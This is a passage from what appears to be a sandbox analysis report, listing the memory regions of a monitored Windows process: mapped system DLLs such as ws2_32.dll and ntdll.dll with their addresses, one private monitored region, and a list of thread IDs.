entry_point = 0x7ffc27f04300 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 1269 start_va = 0x7ffc27f70000 end_va = 0x7ffc2802cfff monitored = 0 entry_point = 0x7ffc27f87070 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1270 start_va = 0x7ffc28030000 end_va = 0x7ffc28104fff monitored = 0 entry_point = 0x7ffc2804d190 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 1271 start_va = 0x7ffc28230000 end_va = 0x7ffc282a8fff monitored = 0 entry_point = 0x7ffc282528f0 region_type = mapped_file name = "coml2.dll" filename = "\\Windows\\System32\\coml2.dll" (normalized: "c:\\windows\\system32\\coml2.dll") Region: id = 1272 start_va = 0x7ffc282b0000 end_va = 0x7ffc2834afff monitored = 0 entry_point = 0x7ffc282cc3e0 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 1273 start_va = 0x7ffc28350000 end_va = 0x7ffc283fdfff monitored = 0 entry_point = 0x7ffc2838b940 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 1274 start_va = 0x7ffc28470000 end_va = 0x7ffc28517fff monitored = 0 entry_point = 0x7ffc2848d990 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 1275 start_va = 0x7ffc28610000 end_va = 0x7ffc28639fff monitored = 0 entry_point = 0x7ffc286148d0 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 1276 start_va = 0x7ffc28e70000 end_va = 0x7ffc29063fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1294 start_va = 0x600000 end_va = 0x67ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000600000" filename = "" Thread: id = 76 os_tid = 0xdf0 Thread: id = 77 os_tid = 0x9ec Thread: id = 78 os_tid = 0xa98 Thread: id = 79 os_tid = 0x504 Thread: id = 80 os_tid = 0x4a8 Thread: id = 81 os_tid = 0x4a4 Thread: id = 82 os_tid = 0x4a0 Thread: id = 83 os_tid = 0x49c Thread: id = 84 os_tid = 0x498 Thread: id = 85 os_tid = 0x474 Thread: id = 86 os_tid = 0x46c Thread: id = 87 os_tid = 0x45c Thread: id = 88 os_tid = 0x8 Thread: id = 90 os_tid = 0xda0